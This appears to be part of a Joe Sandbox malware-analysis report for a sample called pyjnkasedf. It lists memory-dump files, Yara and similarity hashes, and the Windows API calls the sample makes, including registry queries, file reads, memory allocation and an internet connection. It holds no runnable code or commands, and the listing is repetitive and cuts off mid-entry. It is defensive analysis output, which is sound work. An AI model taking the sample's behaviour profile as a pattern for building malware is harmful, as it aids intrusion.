                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ExistsFilePath
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1174141254-0
                                                                                                                                                                                                                                                        • Opcode ID: 5bf39eeb8429b2e1e894f5f4a1b962eb1f45baaf2a6f6124d4ba21e90932bc32
                                                                                                                                                                                                                                                        • Instruction ID: 388b663cd03d39f80f50d475d93cd831f3f2e371ee9bc947d3978df59fcdba6b
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 5bf39eeb8429b2e1e894f5f4a1b962eb1f45baaf2a6f6124d4ba21e90932bc32
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C4F039B5B00206DFCB48CF68DC91EAE37E4EF48608B00452D9C0AD7352DB35EA46CB88
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00420203
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileRead
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                                                                                                                        • Opcode ID: 09cf041921f8d812a03cd92ce09bdd756483eb483413b886829381557a68340a
                                                                                                                                                                                                                                                        • Instruction ID: 1306499c0ef12e4b281d1e0d9f1773bcc1477dc02738e653858cc0b94a33e762
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 09cf041921f8d812a03cd92ce09bdd756483eb483413b886829381557a68340a
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5AF0F870204306DFC700DF24C8C0A99F7F6FB89301F548969E4848B261E771E886CF91
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Enum
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 2928410991-0
                                                                                                                                                                                                                                                        • Opcode ID: 9cc6d87d98baf909a260f5622d38774094ed4254efd2e24a4170faa64fd6c2fd
                                                                                                                                                                                                                                                        • Instruction ID: da4bc58ef716eeb179b7363dd168ef0d2ab5a028fb11f15414fcb7681e24734c
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9cc6d87d98baf909a260f5622d38774094ed4254efd2e24a4170faa64fd6c2fd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3AF05EB0604306DFC714DF15C48196ABBE0FFD8300F10CA2EE88543221D770E590CB82
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,?,?), ref: 0042E3BE
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3660427363-0
                                                                                                                                                                                                                                                        • Opcode ID: e9c8dcff221161336529934429f0e008fec03a56920596d20f5698f67698f351
                                                                                                                                                                                                                                                        • Instruction ID: 17a5e384e04dbe4012146239218b04c71fd024ab7241eb6648189c1e5676b59e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e9c8dcff221161336529934429f0e008fec03a56920596d20f5698f67698f351
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 05E0EDB6205213AFC7119F04CC45E5B7BA5EB98355F22892DF9409B2B2C630E956CB8A
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(?,00000000,?,00000104), ref: 0043060D
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FileModuleName
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 514040917-0
                                                                                                                                                                                                                                                        • Opcode ID: e033ed8e78fa270c3ff6409379c1e9c9d3e5c0262c30eaa311f02c2c5c84f4e5
                                                                                                                                                                                                                                                        • Instruction ID: 59b514b9c1fa0b22063893853964019622cff9fcf6fed364e53aaf9868ddf28e
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e033ed8e78fa270c3ff6409379c1e9c9d3e5c0262c30eaa311f02c2c5c84f4e5
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7E086BA3011005FD210E75CFCC9E6E77ACBB88712F104019F640CF3D4CAB59855CA55
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • VirtualAllocExNuma.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0043C90E), ref: 004016B0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocNumaVirtual
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 4233825816-0
                                                                                                                                                                                                                                                        • Opcode ID: 4f8af259bf6376182aa765b7fb337ef6435cc8c31ae0ff464cb7e3f48b03f0cf
                                                                                                                                                                                                                                                        • Instruction ID: ad7aea396c197a5b1853f485f8964b67d9a17e3a3fc3a37fd52278f19f40f846
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f8af259bf6376182aa765b7fb337ef6435cc8c31ae0ff464cb7e3f48b03f0cf
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 71E09272A19B408BC708FF3CDD5572D7BE0AF85609F44815CD844972A2EB30DA55C7D6
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 004306C2
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AllocateHeap
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1279760036-0
                                                                                                                                                                                                                                                        • Opcode ID: 9d01d631cfcf269a2dd5630fbec9778bbeecb25986dc9904f6a5bd00330ccf22
                                                                                                                                                                                                                                                        • Instruction ID: 7aafd60f9fde0df30e2277ba18362d22fbbbbe0d00e83e07ff97da2d7746e9ba
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9d01d631cfcf269a2dd5630fbec9778bbeecb25986dc9904f6a5bd00330ccf22
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4E09AB93017018FC304CF28EC92E0B77F1AB89B41B158928F90187362EB30E811CB1A
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: ConnectInternet
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3050416762-0
                                                                                                                                                                                                                                                        • Opcode ID: 30f3ed7f7fa52f8ec0efc684cdfc4fe03af83ce1ef97569b36a5141c4d226eaa
                                                                                                                                                                                                                                                        • Instruction ID: e1c5b21f769f02cb01caccd413d00cd593d91cc130ec9661ab253113a64bb2e6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30f3ed7f7fa52f8ec0efc684cdfc4fe03af83ce1ef97569b36a5141c4d226eaa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 33F03470A093018FD304CF28D18466ABBF1BFC8305F10CA6DE44897225EB70D882CB46
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000), ref: 0042F259
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                                                                        • Opcode ID: 42307ce5700113cc83515af5c1cccccf073dd35c55cc0e9d9512166d8d80b19f
                                                                                                                                                                                                                                                        • Instruction ID: f4ae25cfb55fed1d38db322ecf797b22f74c657e57888a169d821529998d2890
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 42307ce5700113cc83515af5c1cccccf073dd35c55cc0e9d9512166d8d80b19f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 97E04FBA2012108FE700DB25DD40C1A33AAAFD57113278715DD12A3359E774EE11CA95
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                                                                                                                                        • Opcode ID: 214d26c772d636acbfda49c83b83e36f616426d355294ba7541bbb3b28e11a4e
                                                                                                                                                                                                                                                        • Instruction ID: f13649728f6b8cf53804a92622954e4a34ccbb6b4d0b7716b7c751a69a32255f
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 214d26c772d636acbfda49c83b83e36f616426d355294ba7541bbb3b28e11a4e
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 74F0ED705043018FD300EF6CDC9076873E0BF90704F000A2CE841E32B2DF3599898B89
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • RegQueryValueExA.KERNEL32(?,?,00000000,00000000,?,?), ref: 0042DCD0
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2023101864.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023077979.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023176833.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023196540.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023216590.0000000000456000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000047B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000004EE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023242056.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2023521336.0000000000664000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_pyjnkasedf.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: QueryValue
                                                                                                                                                                                                                                                        • String ID:
